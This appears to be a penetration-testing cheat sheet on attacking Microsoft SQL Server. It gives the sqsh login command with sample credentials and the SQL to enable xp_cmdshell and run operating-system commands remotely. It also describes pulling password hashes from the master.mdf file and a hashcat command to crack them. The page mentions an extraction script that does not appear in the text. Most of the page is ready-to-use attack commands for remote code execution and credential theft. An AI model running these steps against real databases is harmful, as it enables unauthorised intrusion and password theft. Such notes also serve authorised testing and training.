MSSQL

Microsoft SQL is similar to other SQL databases and it can be accessed using a 'sqsh' tool.

sqsh -S 10.11.1.31 -U test -P "password"

Remote Shell - XP_Cmdshell

Remote commands can be executed on the MSSQL hosting system through the sqsh tool.

The following command can be used to enable xp_cmdshell,

EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go

The following command can be used to execute commands on the remote system,

xp_cmdshell 'whoami';
go

If there is trouble in enabling the xp_cmdshell, then you can try to disable and re-enable it using the following commands,

--Disable
Use Master

GO
EXEC master.dbo.sp_configure 'xp_cmdshell', 0
RECONFIGURE WITH OVERRIDE

GO

EXEC master.dbo.sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
GO

-- Enable
Use Master
GO
EXEC master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
GO

EXEC master.dbo.sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
GO

Master Database File

The master.mdf file records all system level information for a SQL Database. It also contains instance wide meta data such as logon info, endpoints, linked servers and system configuration settings. It also records the existences of all databases and the location of all files.

However, this file cannot be accessed while the database is running as MSSQL processes creates a lock on it. But if you do have access to it, then the login credentials can be extracted from it.

The passwords are hashed and stored in the file, however they can be extracted using the following method and the hash can be cracked using hashcat.

The above script can be used for extracting the hashes. If you are on a Linux system, then you can use Pwsh to run the powershell script.

The has can be cracked as follows,

hashcat -a 0 -m 1731 hash /usr/share/wordlists/rockyou.txt --show